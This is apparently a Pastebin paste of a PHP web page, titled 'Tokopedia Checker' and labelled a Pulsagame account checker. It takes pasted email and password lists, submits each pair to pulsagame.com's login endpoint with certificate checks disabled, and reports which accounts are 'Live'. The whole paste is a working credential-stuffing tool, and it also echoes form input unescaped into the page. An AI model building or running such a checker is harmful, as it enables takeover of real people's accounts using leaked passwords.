Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
- <!-- Bootstrap Start -->
- <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/bootstrap.css">
- <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/main.css">
- <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
- <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js"></script>
- <title>Tokopedia Checker </title>
- <style>
- body {
- padding-top: 60px;
- }
- </style>
- </head>
- <body>
- <div class="container">
- <center>MAX 100 BIAR GAK 500 INTERNAL ERROR</CENTER>
- <div class="panel panel-primary panelMove toggle panelRefresh panelClose">
- <!-- Start .panel -->
- <div class="panel-heading">
- <h4 class="panel-title">Pulsagame[.]com account Checker</h4>
- </div>
- <div class="panel-body">
- <form action="" method="POST">
- <textarea style="background:rgba(0,225,0,00);" name="mailpass" id="mailpass" style="width: 441px; height: 187px;" class="form-control" rows="7" placeholder="your@email.com|passW0rd"><?php
- if (isset($_POST['mailpass'])) {
- echo $_POST['mailpass'];
- }
- ?></textarea><br />
- <input type="text" style="width: 37px; height: 25px;" class="form-control" rows="7" name="delim" value="|">
- <button id=start value="WOOT" name="submit" class="btn btn-success">Check</button> <button id=stop value="WOOT" class="btn btn-success">Stop</button><br><br>
- <?php
- if(isset($_POST['submit'])){
- $delim = $_POST['delim'];
- function search($line, $delim)
- {
- $line = str_replace(" ", "", $line);
- $line = explode($delim, $line);
- $i = 0;
- while ($i < count($line)) {
- if (strpos($line[$i], '@') && strpos($line[$i], '.')) {
- $mail = $line[$i];
- $pass = $line[$i + 1];
- $i = 10000;
- if ($pass == "") {
- $pass = $line[$i - 1];
- }
- }
- $i++;
- }
- $line = $mail . "|" . $pass;
- $line = explode('|', $line);
- return $line;
- }
- $data = $_POST['mailpass'];
- $extract = explode("\r\n", $data);
- $i = 0;
- foreach ($extract AS $k => $line) {
- $i++;
- if (strpos($line, '=>') !== false) {
- $line = str_replace('=>', '|', $line);
- }
- if (strpos($line, ']') !== false) {
- $line = str_replace('=>', '|', $line);
- }
- if (strpos($line, '[') !== false) {
- $line = str_replace('=>', '|', $line);
- }
- $info = search(trim($line), $delim);
- $email = trim($info[0]);
- $pass = $info[1];
- $dir = dirname(__FILE__);
- $config = $dir . '/_cook/' .rand(1,999999999999999). '.txt';
- if (!file_exists($config)) {
- $fp = @fopen($config, 'w');
- @fclose($fp);
- }
- $cookie = 'cookie.txt';
- $ch = curl_init('https://www.pulsagame.com/ajax-login/');
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($ch,CURLOPT_POST,1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
- curl_setopt($ch,CURLOPT_POST,TRUE);
- curl_setopt($ch,CURLOPT_FOLLOWLOCATION,TRUE);
- curl_setopt($ch,CURLOPT_COOKIEFILE, "$config");
- curl_setopt($ch,CURLOPT_COOKIEJAR, "$config");
- curl_setopt($ch,CURLOPT_POSTFIELDS,"email=$email&password=$pass&Submit=login");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- $result = curl_exec($ch);
- $now = "<i style=\"color:blue\">Checked on Localhost at ".date("g:i a - F j, Y")."</i>";
- if(empty($result)){
- echo "<font color=gray><b>Kesalahan Username \/ Password</b></font> => ".$email."|".$pass." | ".$now."<br/>";
- }elseif(preg_match('/salah/i',$result)){
- echo "<font color=red><b>Die</b></font> => ".$email."|".$pass." | ".$now."<br/>";
- }Else{
- echo "<font color=green><b>Live</b></font> => ".$email."|".$pass." | [ACC : Pulsagame] | ".$now."<br/>"; }
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement